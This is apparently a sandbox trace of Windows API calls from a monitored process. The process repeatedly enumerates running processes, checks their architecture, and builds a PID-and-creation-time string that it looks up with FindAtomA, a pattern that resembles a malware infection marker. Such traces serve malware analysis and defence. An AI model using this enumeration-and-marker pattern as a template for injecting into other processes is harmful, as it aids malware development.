	[0081.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x3b0
	[0081.778] IsWow64Process (in: hProcess=0x3b0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.778] CloseHandle (hObject=0x3b0) returned 1
	[0081.815] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0081.815] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0081.815] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0081.815] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0081.815] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0081.815] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0081.815] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0081.815] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0081.815] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0081.816] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0081.816] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0081.816] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0081.816] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0081.816] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0081.816] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0081.816] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0081.816] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0081.816] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0081.816] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x3bc
	[0081.816] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.816] CloseHandle (hObject=0x3bc) returned 1
	[0081.817] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0081.817] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0081.817] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x3bc
	[0081.817] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.817] CloseHandle (hObject=0x3bc) returned 1
	[0081.817] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0081.817] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x3bc
	[0081.817] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.817] CloseHandle (hObject=0x3bc) returned 1
	[0081.817] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x3bc
	[0081.817] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.817] CloseHandle (hObject=0x3bc) returned 1
	[0081.817] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x3bc
	[0081.817] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.817] CloseHandle (hObject=0x3bc) returned 1
	[0081.818] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x3bc
	[0081.818] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.818] CloseHandle (hObject=0x3bc) returned 1
	[0081.818] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x3bc
	[0081.818] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.818] CloseHandle (hObject=0x3bc) returned 1
	[0081.818] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x3bc
	[0081.818] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.818] CloseHandle (hObject=0x3bc) returned 1
	[0081.818] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0081.818] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x3bc
	[0081.818] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.818] CloseHandle (hObject=0x3bc) returned 1
	[0081.818] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x3bc
	[0081.818] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.818] CloseHandle (hObject=0x3bc) returned 1
	[0081.818] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x3bc
	[0081.818] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.819] CloseHandle (hObject=0x3bc) returned 1
	[0081.819] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0081.819] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x3bc
	[0081.819] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.819] CloseHandle (hObject=0x3bc) returned 1
	[0081.819] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x3bc
	[0081.819] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.819] CloseHandle (hObject=0x3bc) returned 1
	[0081.819] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x3bc
	[0081.819] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.819] CloseHandle (hObject=0x3bc) returned 1
	[0081.819] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x3bc
	[0081.819] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.819] CloseHandle (hObject=0x3bc) returned 1
	[0081.819] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x3bc
	[0081.819] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.819] CloseHandle (hObject=0x3bc) returned 1
	[0081.819] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x3bc
	[0081.820] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.820] CloseHandle (hObject=0x3bc) returned 1
	[0081.820] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x3bc
	[0081.820] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.820] CloseHandle (hObject=0x3bc) returned 1
	[0081.820] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x3bc
	[0081.820] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.820] CloseHandle (hObject=0x3bc) returned 1
	[0081.820] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x3bc
	[0081.820] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.820] CloseHandle (hObject=0x3bc) returned 1
	[0081.820] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x3bc
	[0081.820] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.820] CloseHandle (hObject=0x3bc) returned 1
	[0081.820] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x3bc
	[0081.820] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.820] CloseHandle (hObject=0x3bc) returned 1
	[0081.821] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x3bc
	[0081.821] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.821] CloseHandle (hObject=0x3bc) returned 1
	[0081.821] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x3bc
	[0081.821] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.821] CloseHandle (hObject=0x3bc) returned 1
	[0081.821] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x3bc
	[0081.821] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.821] CloseHandle (hObject=0x3bc) returned 1
	[0081.821] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x3bc
	[0081.821] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.821] CloseHandle (hObject=0x3bc) returned 1
	[0081.821] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x3bc
	[0081.821] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.822] CloseHandle (hObject=0x3bc) returned 1
	[0081.822] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x3bc
	[0081.822] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.822] CloseHandle (hObject=0x3bc) returned 1
	[0081.822] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x3bc
	[0081.822] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.822] CloseHandle (hObject=0x3bc) returned 1
	[0081.822] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x3bc
	[0081.822] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.822] CloseHandle (hObject=0x3bc) returned 1
	[0081.822] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x3bc
	[0081.822] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.822] CloseHandle (hObject=0x3bc) returned 1
	[0081.823] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x3bc
	[0081.823] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0081.823] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0081.823] GetProcessTimes (in: hProcess=0x3bc, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0081.823] wsprintfA (in: param_1=0x74e4d8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0081.823] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0081.823] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0081.824] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0081.824] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0081.824] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0081.824] CloseHandle (hObject=0x3bc) returned 1
	[0081.824] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0081.824] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0081.824] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x3bc
	[0081.824] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.825] CloseHandle (hObject=0x3bc) returned 1
	[0081.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0081.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0081.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0081.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0081.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0081.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0081.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0081.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0081.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0081.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0081.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0081.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0081.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0081.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0081.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0081.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0081.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0081.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0081.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x3bc
	[0081.862] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.862] CloseHandle (hObject=0x3bc) returned 1
	[0081.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0081.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0081.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x3bc
	[0081.862] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.862] CloseHandle (hObject=0x3bc) returned 1
	[0081.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0081.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x3bc
	[0081.862] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.862] CloseHandle (hObject=0x3bc) returned 1
	[0081.863] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x3bc
	[0081.863] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.863] CloseHandle (hObject=0x3bc) returned 1
	[0081.863] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x3bc
	[0081.863] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.863] CloseHandle (hObject=0x3bc) returned 1
	[0081.863] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x3bc
	[0081.863] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.863] CloseHandle (hObject=0x3bc) returned 1
	[0081.863] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x3bc
	[0081.863] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.863] CloseHandle (hObject=0x3bc) returned 1
	[0081.863] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x3bc
	[0081.863] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.863] CloseHandle (hObject=0x3bc) returned 1
	[0081.863] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0081.863] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x3bc
	[0081.863] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.864] CloseHandle (hObject=0x3bc) returned 1
	[0081.864] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x3bc
	[0081.864] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.864] CloseHandle (hObject=0x3bc) returned 1
	[0081.864] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x3bc
	[0081.864] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.864] CloseHandle (hObject=0x3bc) returned 1
	[0081.864] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0081.864] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x3bc
	[0081.864] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.864] CloseHandle (hObject=0x3bc) returned 1
	[0081.864] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x3bc
	[0081.864] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.864] CloseHandle (hObject=0x3bc) returned 1
	[0081.864] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x3bc
	[0081.864] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.865] CloseHandle (hObject=0x3bc) returned 1
	[0081.865] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x3bc
	[0081.865] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.865] CloseHandle (hObject=0x3bc) returned 1
	[0081.865] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x3bc
	[0081.865] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.865] CloseHandle (hObject=0x3bc) returned 1
	[0081.865] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x3bc
	[0081.865] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.865] CloseHandle (hObject=0x3bc) returned 1
	[0081.865] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x3bc
	[0081.865] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.865] CloseHandle (hObject=0x3bc) returned 1
	[0081.865] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x3bc
	[0081.865] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.865] CloseHandle (hObject=0x3bc) returned 1
	[0081.865] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x3bc
	[0081.865] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.866] CloseHandle (hObject=0x3bc) returned 1
	[0081.866] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x3bc
	[0081.866] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.866] CloseHandle (hObject=0x3bc) returned 1
	[0081.866] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x3bc
	[0081.866] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.866] CloseHandle (hObject=0x3bc) returned 1
	[0081.866] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x3bc
	[0081.866] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.866] CloseHandle (hObject=0x3bc) returned 1
	[0081.866] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x3bc
	[0081.866] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.866] CloseHandle (hObject=0x3bc) returned 1
	[0081.866] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x3bc
	[0081.866] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.866] CloseHandle (hObject=0x3bc) returned 1
	[0081.866] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x3bc
	[0081.866] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.867] CloseHandle (hObject=0x3bc) returned 1
	[0081.867] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x3bc
	[0081.867] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.867] CloseHandle (hObject=0x3bc) returned 1
	[0081.867] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x3bc
	[0081.867] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.867] CloseHandle (hObject=0x3bc) returned 1
	[0081.867] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x3bc
	[0081.867] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.867] CloseHandle (hObject=0x3bc) returned 1
	[0081.867] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x3bc
	[0081.867] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.867] CloseHandle (hObject=0x3bc) returned 1
	[0081.867] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x3bc
	[0081.867] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.867] CloseHandle (hObject=0x3bc) returned 1
	[0081.867] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x3bc
	[0081.868] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0081.868] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0081.868] GetProcessTimes (in: hProcess=0x3bc, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0081.868] wsprintfA (in: param_1=0x74e4d8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0081.868] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0081.868] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0081.868] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0081.869] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0081.869] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0081.869] CloseHandle (hObject=0x3bc) returned 1
	[0081.869] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0081.869] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0081.869] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x3bc
	[0081.869] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.869] CloseHandle (hObject=0x3bc) returned 1
	[0081.907] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0081.907] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0081.908] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0081.908] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0081.908] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0081.908] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0081.908] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0081.908] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0081.908] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0081.908] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0081.908] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0081.908] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0081.909] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0081.909] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0081.909] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0081.909] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0081.909] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
